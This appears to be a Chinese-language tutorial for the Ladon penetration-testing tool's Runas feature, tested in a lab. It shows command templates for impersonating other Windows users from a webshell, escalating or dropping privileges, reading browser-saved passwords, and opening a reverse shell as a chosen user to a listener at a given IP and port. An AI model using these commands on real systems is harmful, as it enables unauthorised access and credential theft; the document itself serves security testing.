前言
Ladon內置Runas允許用戶用其他權限運行指定的工具和程序。系統自帶Runas命令需要交互式登陸,在webshell或不支持交互式的shell下使用麻煩。而Ladon的Runas則完美解決了以上問題,支持非交互式模擬登陸指定用戶運行程序或命令。
應用場景
1.本機用戶密碼驗證(權限不夠讀不到帳密或HASH的情況下,驗證用戶是否使用某個已知密碼)
2.SYSTEM權限降權,SYS權限下以用戶身份執行命令,實現會話穿透,或訪問特定用戶的DBAPI加密數據
3.低權限用戶提權,網絡服務帳戶或用戶權限下使用管理員權限來執行一些必須管理員才能執行的命令
4.瀏覽器密碼讀取,本機存在多個用戶,需要讀取對應用戶保存帳密(DBAPI),如Chrome、Firefox
5.以指定用戶權限反彈SHELL,當然也可以轉發特定交互式命令行程序
提示:Runas條件是有帳密,提權降權也可使用GetSystem,無需帳密只需指定對應用戶權限進程即可
用法
Ladon Runas user pass cmd
Ladon Runas user pass cmd domain
Ladon RunasCS user pass cmd.exe ip port
測試環境
當前機器默認開啓UAC,登陸用戶爲null,管理員用戶爲k8gege,默認管理員用戶爲Administrator
Runas在不同權限下模擬其它用戶權限有一定區別,如UAC下模擬非內置管理員用戶則受到UAC限制。
測試目的
以不同權限模擬登陸同一用戶執行添加用戶命令,對比Runas的執行權限
爲什麼用添加用戶權限來對比,因爲用戶或管理員UAC是無法添加用戶的
通過是否可添加用戶,可輕易區分模擬後的權限到底是具備什麼權限
Uac權限
非內置管理員用戶在UAC權限下執行命令繼承UAC權限,無法通過該用戶權限添加用戶
但是模擬內置管理員Administrator權限則不受UAC影響,可以通過該權限添加用戶。
Ladon Runas k8gege k8gege520 whoami
Ladon Runas Administrator k8gege520 whoami
Administrator權限
管理員權限下模擬非內置管理員用戶權限,是可以添加用戶的
Ladon Runas k8gege k8gege520 whoami
System權限
SYSTEM權限下模擬非內置管理員用戶權限,是可以添加用戶的
Ladon Runas k8gege k8gege520 whoami
反彈Shell
版本Ladon>=7.8
LadonGUI--Netcat監聽,執行以下命令即可以指定用戶權限反彈shell
Ladon RunasCS user pass cmd.exe ip port
結論
在UAC下需要模擬管理員權限執行命令,先過UAC或使用內置管理員
管理員或SYSTEM權限模擬的用戶具備什麼權限,它就有對應的權限
工具下載
最新版本:https://k8gege.org/Download
歷史版本: https://github.com/k8gege/Ladon/releases
